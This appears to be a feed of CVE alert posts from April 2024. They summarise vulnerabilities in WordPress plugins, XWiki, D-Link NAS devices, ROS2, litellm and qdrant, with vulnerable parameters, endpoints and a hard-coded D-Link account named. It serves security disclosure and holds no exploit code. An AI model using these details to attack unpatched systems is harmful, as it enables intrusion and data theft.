| 2024-04-11 14:07:24 |
🚨 CVE-2024-25297Cross Site Scripting (XSS) vulnerability in Bludit CMS version 3.15, allows remote attackers to execute arbitrary code and obtain sensitive information via edit-content.php.🎖@cveNotify |
|
| 2024-04-11 13:37:42 |
🚨 CVE-2024-32107Cross-Site Request Forgery (CSRF) vulnerability in XLPlugins Finale Lite.This issue affects Finale Lite: from n/a through 2.18.0.🎖@cveNotify |
|
| 2024-04-11 13:37:41 |
🚨 CVE-2024-31937Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Visitor Analytics TWIPLA (Visitor Analytics IO) allows Stored XSS.This issue affects TWIPLA (Visitor Analytics IO): from n/a through 1.2.0.🎖@cveNotify |
|
| 2024-04-11 13:37:40 |
🚨 CVE-2024-31936Cross-Site Request Forgery (CSRF) vulnerability in AyeCode Ltd UsersWP.This issue affects UsersWP: from n/a before 1.2.6.🎖@cveNotify |
|
| 2024-04-11 13:37:36 |
🚨 CVE-2024-31932Cross-Site Request Forgery (CSRF) vulnerability in CreativeThemes Blocksy Companion.This issue affects Blocksy Companion: from n/a through 2.0.28.🎖@cveNotify |
|
| 2024-04-11 13:37:35 |
🚨 CVE-2024-31930Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pdfcrowd Save as PDF plugin by Pdfcrowd allows Stored XSS.This issue affects Save as PDF plugin by Pdfcrowd: from n/a through 3.2.1 .🎖@cveNotify |
|
| 2024-04-11 13:37:31 |
🚨 CVE-2024-31929Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Polevaultweb Intagrate Lite allows Stored XSS.This issue affects Intagrate Lite: from n/a through 1.3.7.🎖@cveNotify |
|
| 2024-04-11 13:37:30 |
🚨 CVE-2024-31926Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BracketSpace Advanced Cron Manager – debug & control allows Stored XSS.This issue affects Advanced Cron Manager – debug & control: from n/a through 2.5.2.🎖@cveNotify |
|
| 2024-04-11 13:37:29 |
🚨 CVE-2024-31925Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FAKTOR VIER F4 Improvements allows Stored XSS.This issue affects F4 Improvements: from n/a through 1.8.0.🎖@cveNotify |
|
| 2024-04-11 13:37:26 |
🚨 CVE-2024-31387Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Popup LikeBox Team Popup Like box allows Stored XSS.This issue affects Popup Like box: from n/a through 3.7.2.🎖@cveNotify |
|
| 2024-04-11 13:37:25 |
🚨 CVE-2024-31285Cross-Site Request Forgery (CSRF) vulnerability in Tooltip WordPress Tooltips allows Stored XSS.This issue affects WordPress Tooltips: from n/a through 9.5.3.🎖@cveNotify |
|
| 2024-04-11 13:08:17 |
🚨 CVE-2024-31985XWiki Platform is a generic wiki platform. Starting in version 3.1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, it is possible to schedule/trigger/unschedule existing jobs by having an admin visit the Job Scheduler page through a predictable URL, for example by embedding such an URL in any content as an image. The vulnerability has been fixed in XWiki 14.10.19, 15.5.5, and 15.9. As a workaround, manually apply the patch by modifying the `Scheduler.WebHome` page.🎖@cveNotify |
|
| 2024-04-11 13:08:11 |
🚨 CVE-2024-29460An issue in PX4 Autopilot v.1.14.0 allows an attacker to manipulate the flight path allowing for crashes of the drone via the home point location of the mission_block.cpp component.🎖@cveNotify |
|
| 2024-04-11 13:08:10 |
🚨 CVE-2024-31984XWiki Platform is a generic wiki platform. Starting in version 7.2-rc-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, by creating a document with a specially crafted title, it is possible to trigger remote code execution in the (Solr-based) search in XWiki. This allows any user who can edit the title of a space (all users by default) to execute any Groovy code in the XWiki installation which compromises the confidentiality, integrity and availability of the whole XWiki installation. This has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1. As a workaround, manually apply the patch to the `Main.SolrSpaceFacet` page.🎖@cveNotify |
|
| 2024-04-11 13:08:09 |
🚨 CVE-2024-31983XWiki Platform is a generic wiki platform. In multilingual wikis, translations can be edited by any user who has edit right, circumventing the rights that are normally required for authoring translations (script right for user-scope translations, wiki admin for translations on the wiki). Starting in version 4.3-milestone-2 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, this can be exploited for remote code execution if the translation value is not properly escaped where it is used. This has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may restrict edit rights on documents that contain translations.🎖@cveNotify |
|
| 2024-04-11 13:08:06 |
🚨 CVE-2024-31982XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.🎖@cveNotify |
|
| 2024-04-11 13:08:05 |
🚨 CVE-2024-31819An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.🎖@cveNotify |
|
| 2024-04-11 13:08:04 |
🚨 CVE-2024-31465XWiki Platform is a generic wiki platform. Starting in version 5.0-rc-1 and prior to versions 14.10.20, 15.5.4, and 15.9-rc-1, any user with edit right on any page can execute any code on the server by adding an object of type `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1. As a workaround, manually apply the patch to the document `XWiki.SearchSuggestSourceSheet`.🎖@cveNotify |
|
| 2024-04-11 13:08:01 |
🚨 CVE-2024-31430Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional, realmag777 BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net.This issue affects WOLF – WordPress Posts Bulk Editor and Manager Professional: from n/a through 1.0.8.1; BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net: from n/a through 1.1.4.1.🎖@cveNotify |
|
| 2024-04-11 13:08:00 |
🚨 CVE-2024-29269An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.🎖@cveNotify |
|
| 2024-04-11 13:07:59 |
🚨 CVE-2022-48618The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.1, watchOS 9.2, iOS 16.2 and iPadOS 16.2, tvOS 16.2. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. Apple is aware of a report that this issue may have been exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-04-11 12:37:38 |
🚨 CVE-2024-32112Cross-Site Request Forgery (CSRF) vulnerability in Leadinfo leadinfo. The patch was released under the same version which was reported as vulnerable. We consider the current version as vulnerable.This issue affects Leadinfo: from n/a through 1.0.🎖@cveNotify |
|
| 2024-04-11 12:37:37 |
🚨 CVE-2024-1488A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.🎖@cveNotify |
|
| 2024-04-11 11:37:33 |
🚨 CVE-2024-20795Animate versions 23.0.4, 24.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-11 11:37:26 |
🚨 CVE-2024-20794Animate versions 23.0.4, 24.0.1 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to an application denial-of-service. An attacker could leverage this vulnerability to cause a system crash, resulting in a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-11 11:37:25 |
🚨 CVE-2024-23190Upsell shop information of an account can be manipulated to execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to a users account or an successful social engineering attack to lure users to maliciously configured accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-defined upsell content has been improved. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-04-11 11:37:24 |
🚨 CVE-2024-23189Embedded content references at tasks could be used to temporarily execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to the users account, access to another account within the same context or an successful social engineering attack to make users import external content. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-generated content has been improved. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-04-11 10:37:39 |
🚨 CVE-2024-3273** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-11 10:37:38 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-11 09:38:00 |
🚨 CVE-2024-20798Illustrator versions 28.3, 27.9.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-11 09:37:59 |
🚨 CVE-2023-32228A firmware bug which may lead to misinterpretation of data in the AMC2-4WCF and AMC2-2WCF allowing an adversary to grant access to the last authorized user.🎖@cveNotify |
|
| 2024-04-11 08:38:00 |
🚨 CVE-2024-23192RSS feeds that contain malicious data- attributes could be abused to inject script code to a users browser session when reading compromised RSS feeds or successfully luring users to compromised accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Potentially malicious attributes now get removed from external RSS content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-04-11 08:37:54 |
🚨 CVE-2024-23191Upsell advertisement information of an account can be manipulated to execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to a users account or an successful social engineering attack to lure users to maliciously configured accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-defined upsell content has been improved. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-04-11 08:37:53 |
🚨 CVE-2023-46604The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath.Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.🎖@cveNotify |
|
| 2024-04-11 08:37:52 |
🚨 CVE-2022-47529Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.🎖@cveNotify |
|
| 2024-04-11 06:37:32 |
🚨 CVE-2024-30916An issue was discovered in eProsima FastDDS v.2.14.0 and before, allows a local attacker to cause a denial of service (DoS) and obtain sensitive information via a crafted max_samples parameter in DurabilityService QoS component.🎖@cveNotify |
|
| 2024-04-11 06:37:27 |
🚨 CVE-2024-29399An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component.🎖@cveNotify |
|
| 2024-04-11 06:37:26 |
🚨 CVE-2024-27630Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.🎖@cveNotify |
|
| 2024-04-11 05:37:30 |
🚨 CVE-2024-30883Reflected Cross Site Scripting (XSS) vulnerability in RageFrame2 v2.6.43, allows remote attackers to execute arbitrary web scripts or HTML and obtain sensitive information via a crafted payload injected into the aspectRatio parameter in the image cropping function.🎖@cveNotify |
|
| 2024-04-11 05:37:29 |
🚨 CVE-2024-30880Reflected Cross Site Scripting (XSS) vulnerability in RageFrame2 v2.6.43, allows remote attackers to execute arbitrary web scripts or HTML and obtain sensitive information via a crafted payload injected into the multiple parameter in the image cropping function.🎖@cveNotify |
|
| 2024-04-11 05:37:26 |
🚨 CVE-2024-30879Reflected Cross Site Scripting (XSS) vulnerability in RageFrame2 v2.6.43, allows remote attackers to execute arbitrary web scripts or HTML and obtain sensitive information via a crafted payload injected into the boxId parameter in the image cropping function.🎖@cveNotify |
|
| 2024-04-11 05:37:25 |
🚨 CVE-2024-21508Versions of the package mysql2 before 3.9.4 are vulnerable to Remote Code Execution (RCE) via the readCodeFor function due to improper validation of the supportBigNumbers and bigNumberStrings values.🎖@cveNotify |
|
| 2024-04-11 05:37:24 |
🚨 CVE-2023-6257The Inline Related Posts WordPress plugin before 3.6.0 does not ensure that post content displayed via an AJAX action are accessible to the user, allowing any authenticated user, such as subscriber to retrieve the content of password protected posts🎖@cveNotify |
|
| 2024-04-11 04:37:25 |
🚨 CVE-2024-29449An issue was discovered in ROS2 Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to obtain sensitive information via man-in-the-middle attacks due to cleartext transmission of data across the ROS2 nodes' communication channels.🎖@cveNotify |
|
| 2024-04-11 04:37:24 |
🚨 CVE-2024-29448A buffer overflow vulnerability has been discovered in the C++ components of ROS2 Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or cause a denial of service (DoS) via improper handling of arrays or strings.🎖@cveNotify |
|
| 2024-04-11 03:37:32 |
🚨 CVE-2024-3620A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /control/adds.php. The manipulation of the argument name/gender/dob/email/mobile/address leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260276.🎖@cveNotify |
|
| 2024-04-11 03:37:27 |
🚨 CVE-2024-3618A vulnerability, which was classified as critical, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected is an unknown function of the file /control/activate_case.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-260274 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-11 03:37:26 |
🚨 CVE-2024-25572Cross-site request forgery (CSRF) vulnerability exists in Ninja Forms prior to 3.4.31. If a website administrator views a malicious page while logging in, unintended operations may be performed.🎖@cveNotify |
|
| 2024-04-11 02:37:36 |
🚨 CVE-2024-3652The Libreswan Project was notified of an issue causing libreswan to restart when using IKEv1 without specifying an esp= line. When the peer requests AES-GMAC, libreswan's default proposal handler causes an assertion failure and crashes and restarts. IKEv2 connections are not affected.🎖@cveNotify |
|
| 2024-04-11 02:37:33 |
🚨 CVE-2024-3617A vulnerability, which was classified as critical, has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This issue affects some unknown processing of the file /control/deactivate_case.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260273 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-11 02:37:32 |
🚨 CVE-2024-29452An insecure deserialization vulnerability has been identified in ROS2 Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code and obtain sensitive information via crafted input to the Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.🎖@cveNotify |
|
| 2024-04-11 02:37:31 |
🚨 CVE-2023-6811The Language Translate Widget for WordPress – ConveyThis plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'api_key’ parameter in all versions up to, and including, 223 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-11 01:37:34 |
🚨 CVE-2020-9015Arista DCS-7050QX-32S-R 4.20.9M, DCS-7050CX3-32S-R 4.20.11M, and DCS-7280SRAM-48C6-R 4.22.0.1F devices (and possibly other products) allow attackers to bypass intended TACACS+ shell restrictions via a | character. NOTE: the vendor reports that this is a configuration issue relating to an overly permissive regular expression in the TACACS+ server permitted commands🎖@cveNotify |
|
| 2024-04-11 01:37:27 |
🚨 CVE-2020-8516The daemon in Tor through 0.4.1.8 and 0.4.2.x through 0.4.2.6 does not verify that a rendezvous node is known before attempting to connect to it, which might make it easier for remote attackers to discover circuit information. NOTE: The network team of Tor claims this is an intended behavior and not a vulnerability🎖@cveNotify |
|
| 2024-04-11 01:37:26 |
🚨 CVE-2020-7058data_input.php in Cacti 1.2.8 allows remote code execution via a crafted Input String to Data Collection -> Data Input Methods -> Unix -> Ping Host. NOTE: the vendor has stated "This is a false alarm.🎖@cveNotify |
|
| 2024-04-11 01:07:43 |
🚨 CVE-2003-0249PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report.🎖@cveNotify |
|
| 2024-04-11 01:07:37 |
🚨 CVE-2002-2379Cisco AS5350 IOS 12.2(11)T with access control lists (ACLs) applied and possibly with ssh running allows remote attackers to cause a denial of service (crash) via a port scan, possibly due to an ssh bug. NOTE: this issue could not be reproduced by the vendor🎖@cveNotify |
|
| 2024-04-11 01:07:36 |
🚨 CVE-2002-1775NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus (NAV) 2002 allows remote attackers to bypass the initial virus scan and cause NAV to prematurely stop scanning by using a non-RFC compliant MIME header. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the AutoProtect feature would detect the virus before it is executed🎖@cveNotify |
|
| 2024-04-11 01:07:35 |
🚨 CVE-2002-1774NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to send viruses that bypass the e-mail scanning via a NULL character in the MIME header before the virus. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the AutoProtect feature would detect the virus before it is executed🎖@cveNotify |
|
| 2024-04-11 00:37:32 |
🚨 CVE-2024-29447An issue was discovered in the default configurations of ROS2 Humble Hawksbill in ROS2 Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows unauthenticated attackers to gain access using default credentials.🎖@cveNotify |
|
| 2024-04-11 00:37:25 |
🚨 CVE-2001-1533Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service via a flood of fragmented UDP packets. NOTE: the vendor disputes this issue, saying that it requires high bandwidth to exploit, and the server does not experience any instability. Therefore this "laws of physics" issue might not be included in CVE🎖@cveNotify |
|
| 2024-04-11 00:37:24 |
🚨 CVE-2001-1517RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information🎖@cveNotify |
|
| 2024-04-10 23:37:32 |
🚨 CVE-2024-30728An issue was discovered in the default configurations of ROS (Robot Operating System) Kinetic Kame ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, allows unauthenticated attackers to gain access using default credentials.🎖@cveNotify |
|
| 2024-04-10 23:37:25 |
🚨 CVE-2024-29445An issue was discovered in ROS2 (Robot Operating System 2) Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3 where the system transmits messages in plaintext, allowing attackers to access sensitive information via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-04-10 23:37:24 |
🚨 CVE-2024-29439An unauthorized node injection vulnerability has been identified in ROS2 Humble Hawksbill in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to escalate privileges and inject malicious ROS2 nodes into the system.🎖@cveNotify |
|
| 2024-04-10 22:37:27 |
🚨 CVE-2024-31999@festify/secure-session creates a secure stateless cookie session for Fastify. At the end of the request handling, it will encrypt all data in the session with a secret key and attach the ciphertext as a cookie value with the defined cookie name. After that, the session on the server side is destroyed. When an encrypted cookie with matching session name is provided with subsequent requests, it will decrypt the ciphertext to get the data. The plugin then creates a new session with the data in the ciphertext. Thus theoretically the web instance is still accessing the data from a server-side session, but technically that session is generated solely from a user provided cookie (which is assumed to be non-craftable because it is encrypted with a secret key not known to the user). The issue exists in the session removal process. In the delete function of the code, when the session is deleted, it is marked for deletion. However, if an attacker could gain access to the cookie, they could keep using it forever. Version 7.3.0 contains a patch for the issue. As a workaround, one may include a "last update" field in the session, and treat "old sessions" as expired.🎖@cveNotify |
|
| 2024-04-10 22:37:26 |
🚨 CVE-2024-31995`@digitalbazaar/zcap` provides JavaScript reference implementation for Authorization Capabilities. Prior to version 9.0.1, when invoking a capability with a chain depth of 2, i.e., it is delegated directly from the root capability, the `expires` property is not properly checked against the current date or other `date` param. This can allow invocations outside of the original intended time period. A zcap still cannot be invoked without being able to use the associated private key material. `@digitalbazaar/zcap` v9.0.1 fixes expiration checking. As a workaround, one may revoke a zcap at any time.🎖@cveNotify |
|
| 2024-04-10 22:37:25 |
🚨 CVE-2024-28219In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.🎖@cveNotify |
|
| 2024-04-10 21:37:32 |
🚨 CVE-2024-31986XWiki Platform is a generic wiki platform. Starting in version 3.1 and prior to versions 4.10.19, 15.5.4, and 15.10-rc-1, by creating a document with a special crafted documented reference and an `XWiki.SchedulerJobClass` XObject, it is possible to execute arbitrary code on the server whenever an admin visits the scheduler page or the scheduler page is referenced, e.g., via an image in a comment on a page in the wiki. The vulnerability has been fixed in XWiki 14.10.19, 15.5.5, and 15.9. As a workaround, apply the patch manually by modifying the `Scheduler.WebHome` page.🎖@cveNotify |
|
| 2024-04-10 21:37:25 |
🚨 CVE-2024-1481A flaw was found in FreeIPA. This issue may allow a remote attacker to craft a HTTP request with parameters that can be interpreted as command arguments to kinit on the FreeIPA server, which can lead to a denial of service.🎖@cveNotify |
|
| 2024-04-10 21:37:24 |
🚨 CVE-2024-31984XWiki Platform is a generic wiki platform. Starting in version 7.2-rc-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, by creating a document with a specially crafted title, it is possible to trigger remote code execution in the (Solr-based) search in XWiki. This allows any user who can edit the title of a space (all users by default) to execute any Groovy code in the XWiki installation which compromises the confidentiality, integrity and availability of the whole XWiki installation. This has been patched in XWiki 14.10.20, 15.5.4 and 15.10 RC1. As a workaround, manually apply the patch to the `Main.SolrSpaceFacet` page.🎖@cveNotify |
|
| 2024-04-10 20:37:25 |
🚨 CVE-2021-46948In the Linux kernel, the following vulnerability has been resolved:sfc: farch: fix TX queue lookup in TX event handlingWe're starting from a TXQ label, not a TXQ type, so efx_channel_get_tx_queue() is inappropriate (and could return NULL, leading to panics).🎖@cveNotify |
|
| 2024-04-10 20:37:24 |
🚨 CVE-2021-46945In the Linux kernel, the following vulnerability has been resolved:ext4: always panic when errors=panic is specifiedBefore commit 014c9caa29d3 ("ext4: make ext4_abort() use__ext4_error()"), the following series of commands would trigger apanic:1. mount /dev/sda -o ro,errors=panic test2. mount /dev/sda -o remount,abort testAfter commit 014c9caa29d3, remounting a file system using the testmount option "abort" will no longer trigger a panic. This commit willrestore the behaviour immediately before commit 014c9caa29d3.(However, note that the Linux kernel's behavior has not beenconsistent; some previous kernel versions, including 5.4 and 4.19similarly did not panic after using the mount option "abort".)This also makes a change to long-standing behaviour; namely, thefollowing series commands will now cause a panic, when previously itdid not:1. mount /dev/sda -o ro,errors=panic test2. echo test > /sys/fs/ext4/sda/trigger_fs_errorHowever, this makes ext4's behaviour much more consistent, so this isa good thing.🎖@cveNotify |
|
| 2024-04-10 20:07:24 |
🚨 CVE-2021-46939In the Linux kernel, the following vulnerability has been resolved:tracing: Restructure trace_clock_global() to never blockIt was reported that a fix to the ring buffer recursion detection wouldcause a hung machine when performing suspend / resume testing. Thefollowing backtrace was extracted from debugging that case:Call Trace: trace_clock_global+0x91/0xa0 __rb_reserve_next+0x237/0x460 ring_buffer_lock_reserve+0x12a/0x3f0 trace_buffer_lock_reserve+0x10/0x50 __trace_graph_return+0x1f/0x80 trace_graph_return+0xb7/0xf0 ? trace_clock_global+0x91/0xa0 ftrace_return_to_handler+0x8b/0xf0 ? pv_hash+0xa0/0xa0 return_to_handler+0x15/0x30 ? ftrace_graph_caller+0xa0/0xa0 ? trace_clock_global+0x91/0xa0 ? __rb_reserve_next+0x237/0x460 ? ring_buffer_lock_reserve+0x12a/0x3f0 ? trace_event_buffer_lock_reserve+0x3c/0x120 ? trace_event_buffer_reserve+0x6b/0xc0 ? trace_event_raw_event_device_pm_callback_start+0x125/0x2d0 ? dpm_run_callback+0x3b/0xc0 ? pm_ops_is_empty+0x50/0x50 ? platform_get_irq_byname_optional+0x90/0x90 ? trace_device_pm_callback_start+0x82/0xd0 ? dpm_run_callback+0x49/0xc0With the following RIP:RIP: 0010:native_queued_spin_lock_slowpath+0x69/0x200Since the fix to the recursion detection would allow a single recursion tohappen while tracing, this lead to the trace_clock_global() taking a spinlock and then trying to take it again:ring_buffer_lock_reserve() { trace_clock_global() { arch_spin_lock() { queued_spin_lock_slowpath() { /* lock taken */ (something else gets traced by function graph tracer) ring_buffer_lock_reserve() { trace_clock_global() { arch_spin_lock() { queued_spin_lock_slowpath() { /* DEAD LOCK! */Tracing should *never* block, as it can lead to strange lockups like theabove.Restructure the trace_clock_global() code to instead of simply taking alock to update the recorded "prev_time" simply use it, as two eventshappening on two different CPUs that calls this at the same time, reallydoesn't matter which one goes first. Use a trylock to grab the lock forupdating the prev_time, and if it fails, simply try again the next time.If it failed to be taken, that means something else is already updatingit.Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=212761🎖@cveNotify |
|
| 2024-04-10 19:07:24 |
🚨 CVE-2021-46937In the Linux kernel, the following vulnerability has been resolved:mm/damon/dbgfs: fix 'struct pid' leaks in 'dbgfs_target_ids_write()'DAMON debugfs interface increases the reference counts of 'struct pid'sfor targets from the 'target_ids' file write callback('dbgfs_target_ids_write()'), but decreases the counts only in DAMONmonitoring termination callback ('dbgfs_before_terminate()').Therefore, when 'target_ids' file is repeatedly written without DAMONmonitoring start/termination, the reference count is not decreased andtherefore memory for the 'struct pid' cannot be freed. This commitfixes this issue by decreasing the reference counts when 'target_ids' iswritten.🎖@cveNotify |
|
| 2024-04-10 18:07:25 |
🚨 CVE-2021-46932In the Linux kernel, the following vulnerability has been resolved:Input: appletouch - initialize work before device registrationSyzbot has reported warning in __flush_work(). This warning is caused bywork->func == NULL, which means missing work initialization.This may happen, since input_dev->close() callscancel_work_sync(&dev->work), but dev->work initalization happens _after_input_register_device() call.So this patch moves dev->work initialization before registering inputdevice🎖@cveNotify |
|
| 2024-04-10 17:37:42 |
🚨 CVE-2024-31342Missing Authorization vulnerability in WPcloudgallery WordPress Gallery Exporter.This issue affects WordPress Gallery Exporter: from n/a through 1.3.🎖@cveNotify |
|
| 2024-04-10 17:37:41 |
🚨 CVE-2024-2952BerriAI/litellm is vulnerable to Server-Side Template Injection (SSTI) via the `/completions` endpoint. The vulnerability arises from the `hf_chat_template` method processing the `chat_template` parameter from the `tokenizer_config.json` file through the Jinja template engine without proper sanitization. Attackers can exploit this by crafting malicious `tokenizer_config.json` files that execute arbitrary code on the server.🎖@cveNotify |
|
| 2024-04-10 17:37:40 |
🚨 CVE-2024-2221qdrant/qdrant is vulnerable to a path traversal and arbitrary file upload vulnerability via the `/collections/{COLLECTION}/snapshots/upload` endpoint, specifically through the `snapshot` parameter. This vulnerability allows attackers to upload and overwrite any file on the filesystem, leading to potential remote code execution. This issue affects the integrity and availability of the system, enabling unauthorized access and potentially causing the server to malfunction.🎖@cveNotify |
|
| 2024-04-10 17:37:37 |
🚨 CVE-2024-2217gaizhenbiao/chuanhuchatgpt is vulnerable to improper access control, allowing unauthorized access to the `config.json` file. This vulnerability is present in both authenticated and unauthenticated versions of the application, enabling attackers to obtain sensitive information such as API keys (`openai_api_key`, `google_palm_api_key`, `xmchat_api_key`, etc.), configuration details, and user credentials. The issue stems from the application's handling of HTTP requests for the `config.json` file, which does not properly restrict access based on user authentication.🎖@cveNotify |
|
| 2024-04-10 17:37:36 |
